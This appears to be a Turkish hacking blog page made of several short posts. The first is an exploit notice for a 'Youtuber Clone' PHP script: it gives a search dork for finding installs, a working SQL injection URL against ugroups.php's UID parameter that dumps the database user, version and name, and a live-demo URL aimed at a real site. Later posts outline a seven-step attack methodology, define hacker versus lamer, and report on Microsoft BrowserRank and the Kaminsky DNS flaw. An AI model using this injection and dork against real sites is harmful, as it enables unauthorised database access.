Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability

|___________________________________________________|
|
| Youtuber Clone (UID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.greatclone.com/product_info.php?cPath=30&products_id=86
|
| DorK   : "Everyone should be on TV! Now you can upload 2 TV"
|
|___________________________________________________|



Exploit: 

www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--





L!VE DEMO: :


http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

Leia Mais

Google'ın PageRank'ine karşı Microsoft'un browserrak'ı

Google'ın türlü atılımları altında zayıf duruma düşen microsoft, Singapur'daki bir konferansta Google'ın PageRank algoritmasına yakın BrowserRank'tan bahsetti. Microsoft'un bu yeni algoritması teoride, sitelerin ziyaret oranları ve ziyaretçilerinin tutumlarına göre şekillenecek. Büyük bir gizem olarak kalan Google PageRank'in algoritmasının aksine microsoft, kullanıcıların sitede geçirdikleri süre zarfını esas alacak ve oranları buna göre belirleyecek.

Google PageRank'inin esası olan arama motru optimizasyonu (Search Engine Optimization=SEO) karşısında Microsoft'un BrowserRank'inin ne gibi teknolojileri ve düzenlemeleri beraberinde getireceği şu anda meçhul. Belirtilen detaylar arasında BrowserRank'ın kullanıcı tarayıcısından bilgi toplayacağı ve bunu bir yerde biriktireceği söyleniyor.

Aslına bakılırsa, kolayca, Alexa Rank'e benzer bir nitelikte olacağı gözlemlenen BrowserRank'in Google'ın PageRank'ine karşı pek fazla bir şansız olamaz diyebiliriz.

Leia Mais

Hackerlar Ne Yaparlar?

Hackerlar, sabırlı ve her adımlarını dikkatlice dökümanlayarak çalışırlar. Hackerın amacı, belirlediği hedefin yada uygulamanın imajını zedelemek, prestijini düşürmek güveniliriliğine zarar vermek.

Hacker elinde hedefine ait az yada hiç olmayan bilgilerle işe başlar; öyleki küçük analaziler sonunda yol haritasını belirleyeceği yeterli bilgiye ulaşır. Bu ancak dikkatli bir analiz ve sistemli bir araştırma sonucu elde edilebilir.

Hackerların genellikle kullandığı yöntemler 7 adımdan oluşur:
1. Hedifin ayak izlerini analiz et
2. Bilgileri sırala
3. Kullanıcı bilgilerine ulaş
4. Ayrıcalıklarını arttır
5. Ekstra şifre ve gizli bilgileri kopar
6. Arka kapıyı kur
7. İçeri gir sistemi devir

Hacker önce hedef alacağı alan adlarını saptar. Daha sonra, bunların ayak izlerini takip ederi. Bu takip hedefi hakkında edinebilecek en fazla bilgiye ulaşmak içindir. Bu takibi, hedefine ait bilgilerin herkese açık kaynaklardan yapar.

Ayak izi analizinin sonunda hacker şu bilgilere ulaşaır:
- Hedefin büyüklüğü
- Potansiyel giriş noktları
- Güvenlik mekanizmasının olup olmadığı varsa bunun ne olduğu

Ayak izi analizi sırasında hacker, saldırı sırasında işine yarayacak bilgilerelde etmeye çalışır. Bu bilgiler:
• Şirket adları
• Alan adları
• Şubeleri
• IP adresleri
• Telefon numaraları

Ayak izi analizi sonrasında hacker elde ettiği bilgiler ve bu bilgiler doğrultusunda çizdiği yol haritası sonucunda hedefin ağ bilgilerine ulaşmış olur. Ardından bu bilgeler ile hedef sistem hakkında edinebildiği kadar fazla dataya ulaşmaya çalışır.

Hacker, hedefin ne tür bir ağ, FTP veya mail server kullandığını, TCP ve UDP portlarına bağlanarak yada bu bu portları dinleyerek ve bu portlara rasgele veriler gönderek belirler. Birçok servis, genel olarak kendilerine gelen bu rastgele verilere yanıt verir bu yanıtlar da hackerlar için aradıklarını bulma noktasında son derece faydalıdır.

Hacker bu bilgileri oluşturduğu, hassasiyet veri tabanına yollar.

Bu veritabanında saklanan hassas bilgiler, eğer hacker hedifin sunucusu ile temas kurabilmişse, şunlardır:
• Kullanıcı adları
• Son giriş yaptığı tarih
• Şifre değişim günler
• Tanımlandığı kullanıcı grupları

Hacek sorgulama sonucu ulaştığı bu bilgileri, sisteme, kayıtlı kullanıcı girişi için yapacağı şiddetli saldırıda kullanacak. Örneğin hackerın karşılaştığı TEST yada BACKUP gibi kullanıcı adları genel olarak şifreleri kolay tahimin edilebilir türden kullanıcı adlarıdır. Bu da hackerın işini oldukça kolaylaştırır. Hele bu kullanıcılar Lokal Admin ise...

Hedefi hakkında yeterli bilgileri elde eden hacker, artık sisteme o şirkette çalışan herhangi birinini kullanıcı adına ulaşmış olur. Bu şu manaya gelmektedir: Hackerın tek bir ihtiayacı kalmışıtır. O da kullanıcıların şifreleri.

Şifreleri elde etmenin iki yolu vardır: Sosyal mühendislik (şifreleri tahimn etme) yada sistem saldırıları ve veri tabanlarına ulaşma.

Hacker bir şifre buluduktan ve şifresini ele geçirdiği kulanıcıcın sistem üzerindeki yetkilerini öğrendikten sonra, bu kullanıcıcn sistem üzerindeki izinlerini arttırmaya çalışır (admin değil ise)

Eğer hacker kullanıcının izinlerini ssitem yöneticisi (admin) şeklinde arttırabilmişse işte o andan itibaren herşey kontrolu altında demektir.

Leia Mais

Hack, Hacker ve Lamer Kavramları

Kafasını bu kavramlarla bozmuş olan ya da bu ilgi çekici konulara heyecanla odaklanmış herkesin en az bir kere okuduğu makaleleri tekrarlamak değil amacım. Amacım kesin bir dille sınırlar çizmek ve bu kavramlara bağlı sınırların silikleşmesinin getireceği saçma yanlışlıkları ortadan kaldırmaktır.

En dikkatli kimselerin dahi alışılageldiği üzere yanlışı göre göre yaptıkları niteliksiz benzetmenin adına maalesef günümüzde "hack" diyoruz. Bunu korsanlıkla ya da daha farklı amaçsız yalnızca ego tatmini saldırılarla sınırlıyoruz. Halbuki işin aslı böyle midir? Tabii ki hayır, kesinlikle hayır.

Nedir hack ve hacker?

Bir işi(gelebilecek her iş, doktorluk, mühendislik, etc.) standart yolların dışında, dolaylı ya da dolaysız, mümkün gibi görünmeyen ya da uzman olmayan kişilerin kolaylıkla göremeyeceği ve hatta uzmanlarınında farkında olamayacağı yollardan hızlı ve şaşırtıcı şekilde yapmaya ya da yapabilmeye "hack" diyoruz.

Kendi uygulama ve öğrenme alanımız olan bilgisayar ve iletişim teknolojilerindeki gerçek tanımıyla, hack ya da hacking;

bilgisayar üzerinde bir işin geleneksel yöntemlerin dışında ve derin tecrübeler ışığında en hızlı ve garip şekilde yapılması işidir. Ve bu gücü(tecrübe ve bilgi) elinde bulunduran çalışkan ve akıllı insanlara hacker denir.

Günümüz anlayışındaki "hack" kavramına yakın bir örnekleme yapmak gerekirse.
Bir sistemdeki gizli ya da korumalı verileri edinmeyi kafasına koymuş, bu iş için kendi tekniğini geliştirebilecek derinlikte, bilgi/tecrübe kapasitesinde biri amaçlarına ulaşmak için "hacker" kavramının içini tam manasıyla doldurabilir. Peki daha derine inersek, verilere ulaşmaya çalışan "hacker" neler yapar ya da yapabilir ya da nasıl ve ne şekilde ona hacker diyoruz?

- Birçok güvenlik tarayıcısyla karşıdaki sistemi analiz eder.
- Sistem üzerinde yaptığı taramanın ortak analiz sonuçlarından kendine ve bilgisine uygun hedefler belirler.
- Olağan taramalar sonucunda herhangi bir sıradışılık yoksa, sistemdeki çalışan uygulamaları kendi yerel makinasına kurarak hata testine sokar ve hata aramaya koyulur. (çalışan uygulamaların hata yapmasını sağlamak, hatalardan kendine giriş kapısı yaratmak vb. gibi)

Bu örnekte "hacker" in karşı sistemde çalışan bir servis yazılımı üzerinde "bellek taşması" hatası bulduğunu farzedelim. Ve bunu kullanarak sisteme sızması gerekmekte.

Bellek taşması hatasını bulup sisteme girebilmesi için bu "hacker" in;
- Hafıza yönetimi, sistem çağrıları hakkında,
- Düşük seviye programlama hakkında,
- İletişim protokolleri hakkında

derin bilgi ve tecrübeye ihtiyacı vardır. Bunlardan birinin eksikliği (ve benim eksik bırakmış olabileceklerim) bellek taşmasını nasıl kullanacağını bilmemeye ve bunun "hacker" i çözüme kavuşturamamasına neden olacaktır.

Peki bunları bilmeden de "hacker" olunabilir mi?

Elbetteki "hack" kavramından tüm anladığınız isim yapmaksa, başkasının geliştirdiği araçlarla ve yöntemlerle ve artık deneye deneye suyu çıkmış halka malolmuş yöntem ve tekniklerle sizde "sözde hacker" olabilirsiniz. Ama aslında isminiz sizinde bildiği gibi "lamer" dir.

Eğer "lamer" tanımına uyuyorsanız aslında yaptığınız iş birazda şuna benzemektedir.

Leonardo da Vinci bir resim yapar ve yıllar sonra ünlü olacaktır. Adı "Monalisa" dır.

Siz onun yaptığı resmin üzerindeki kaba hatları kullanarak kurşun kalemle üzerinden geçersiniz ve gerçek resmi arkadan almadığınız sürece sizde usta gibi görünürsünüz ama aslında sizin "hacking" iniz şudur:

Gerçek "hacker" ile sözde hacker yani "lamer" arasındaki fark aynen yukarıdaki iki resim arasındaki fark gibidir. Yani birileri sizin gerçek leonardo da vinci birikiminde olmadığınızı anlaya kadar ve yüzünüzdeki maske düşmeyene kadar sizde leonardo gibi gezebilirsiniz. Ama aslında kendinizi kandırmaktan öteye gitmiyorsunuzdur.

Leia Mais

DNS Üzerinde Kritik Güvenlik Açığı

Geçtiğimiz ay içerisinde Dan Kaminsky isimli bir güvenlik araştırmacısı DNS üzerinde çok ciddi güvenlik açıkları tespit ettiklerini ve DNS sunucularının acilen güvenlik önlemleri almaları gerektiğini söylemişti. Her ne kadar güvenlik açığı public edilmemiş olsa da geçen sürede özellikle DNS cache-poisoning yöntemi ile birçok web sayfası saldırıya uğramıştı.

Bunun üzerinde metasploit projesinin geliştiriciler DNS (domain name server) sunucularında çalışan 2 exploit yayınladı. Yine bunun üzerine Microsoft acilen bir yama yayınladı. Diğer işletim sistemlerinde ise güvenlik açığının aktif olup olmadığı henüz belirsiz.

Yayınlanan exploit’ler şuanda sadece ISPler tarafından kullanılan kaşe sunucularında çalışmakta fakat exploit’in yazarları bunların modifiye edilmesi durumunda istemci tabanlı sistemlerde de çalışabileceğini söyledi.

Leia Mais